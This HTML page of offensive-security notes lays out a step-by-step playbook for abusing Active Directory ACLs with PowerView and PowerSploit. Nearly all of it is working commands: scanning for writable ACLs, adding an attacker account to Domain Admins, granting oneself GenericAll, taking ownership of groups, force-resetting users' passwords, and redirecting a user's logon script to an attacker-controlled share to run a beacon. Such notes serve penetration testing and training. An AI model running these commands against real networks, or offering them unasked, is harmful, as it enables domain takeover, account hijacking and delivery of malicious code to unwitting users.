<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows - Powerview, enumerate groups/ACL</title>
</head><body>Using Powerview Master branch (Not Dev Branch)<br/>
<br/>
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces<br/>
<br/>
<u><b>What does the powerview output look like?</b></u><br/>
<br/>
InheritedObjectType &nbsp; : All<br/>
ObjectDN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: CN=LocalAdmins,CN=Users,DC=it,DC=RagePwn,DC=local<br/>
ObjectType &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: All<br/>
IdentityReference &nbsp; &nbsp; : IT\Domain Admins<br/>
IsInherited &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : False<br/>
ActiveDirectoryRights : GenericAll<br/>
PropagationFlags &nbsp; &nbsp; &nbsp;: None<br/>
ObjectFlags &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : None<br/>
InheritanceFlags &nbsp; &nbsp; &nbsp;: None<br/>
InheritanceType &nbsp; &nbsp; &nbsp; : None<br/>
AccessControlType &nbsp; &nbsp; : Allow<br/>
ObjectSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : S-1-5-21-948911695-1962824894-4291460540-1234 <br/>
<br/>
<br/>
<u><b>Step 0. Do a sweep of what ACL's you have permission over look for WriteDACL, GenericAll etc</b></u><br/>
<br/>
Invoke-ACLScanner<br/>
<br/>
<u><b>Step 1. Find basic info about a group</b></u><br/>
<br/>
a. Get-NetGroup "localadmins" -FullData<br/>
<br/>
b. Grab data from distinguished name field on output e.g., "CN=Domain Admins,CN=Users,DC=RagePwn,DC=local"<br/>
<br/>
<u><b>Step 2. Verify what ACL's we have privileges over</b></u><br/>
<br/>
<u>example 1, get ACL listing over the group Domain Admins.</u>&nbsp;Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=RagePwn,DC=local"}<br/>
<br/>
<u>example 2, Get ACL listing over the user george as the user bob.</u>&nbsp;Get-ObjectAcl -ResolveGUIDs -SamAccountName george | ? {$_.IdentityReference -eq "RagePwn\bob"}<br/>
<br/>
**Look at Identity Reference - this should be your name e.g., RagePwn\normaluser99<br/>
**Look at Active Directory Rights - Generic All etc means you can do anything, see below for a list of rights<br/>
<br/>
<u><b><span style="font-size: 12pt">Step 3. Abuse Examples</span></b></u><br/>
<br/>
<b>a. If you have generic all under Active Directory Rights, you can add yourself to a group</b><br/>
<br/>
net group "domain admins" normaluser99 /add /domain<br/>
<br/>
net user normaluser99 /domain; Add-NetGroupUser -UserName normaluser99 -GroupName "domain admins" -Domain "offense.local"; net user normaluser99 /domain<br/>
<br/>
# with active directory module<br/>
Add-ADGroupMember -Identity "domain admins" -Members spotless<br/>
<br/>
# with Powersploit<br/>
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"<br/>
<br/>
<b>b. If you have WriteDacl, WriteOwner you can give yourself generic all on the group "localadmins"</b><br/>
<br/>
$ADSI = [ADSI]"LDAP://CN=LocalAdmins,CN=Users,DC=it,DC=gcb,DC=local"<br/>
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])<br/>
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,"GenericAll","Allow"<br/>
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)<br/>
$ADSI.psbase.commitchanges()<br/>
<br/>
<b>c. If you have WriteProperty on Active Directory Rights add yourself to a group &nbsp;</b><br/>
<br/>
net group "domain admins" normaluser99 /add /domain<br/>
<br/>
# with active directory module<br/>
Add-ADGroupMember -Identity "domain admins" -Members spotless<br/>
<br/>
# with Powersploit<br/>
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"<br/>
<br/>
If we have Extended Rights on User-Force-Change-Password Object Type, we can reset a user's password without them knowing<br/>
<br/>
<b>d. If you have Self-Membership on an object type, you can add yourself to a group</b><br/>
<br/>
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain<br/>
<br/>
<b>e. If we have ExtendedRight on User-Force-Change-Password object type, we can reset the user's password without knowing their current password:</b><br/>
<br/>
Get-ObjectAcl -SamAccountName normaluser99 -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}<br/>
<br/>
#powerview<br/>
Set-DomainUserPassword -Identity normaluser99 -Verbose<br/>
<br/>
$c = Get-Credential<br/>
Set-DomainUserPassword -Identity normaluser99 -AccountPassword $c.Password -Verbose<br/>
<br/>
<u>#one-liner, for things like Cobalt Strike</u><br/>
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose<br/>
<br/>
<b>f. If we have Write Owner on a Group, we can become the owner of that group</b><br/>
<br/>
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "normaluser99" -Verbose<br/>
<br/>
-Identity if the SID of Domain Admins<br/>
-OwnerIdentity is the new owner of Domain Admins<br/>
<br/>
<b>g. If we have WriteProperty on an Object Type (in this case, Script-Path) we can overwrite the logon script path of a user</b><br/>
<br/>
Set-ADObject -SamAccountName normaluser99 -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"<br/>
<br/>
The above command will set normaluser99's logonscript to "\\10.0.0.5\totallyLegitScript.ps1" - beacons anyone?<br/>
<br/>
<br/>
<u><b><span style="font-size: 12pt">ACL Rights</span></b></u><br/>
<ul><li>GenericAll - full rights to the object (add users to a group or reset user's password)</li>
<li>GenericWrite - update object's attributes (i.e logon script)</li>
<li>WriteOwner - change object owner to attacker controlled user take over the object</li>
<li>WriteDACL - modify object's ACEs and give attacker full control right over the object</li>
<li>AllExtendedRights - ability to add user to a group or reset password</li>
<li>ForceChangePassword - ability to change user's password</li>
<li>Self (Self-Membership) - ability to add yourself to a group</li>
</ul>
<br/>
</body></html>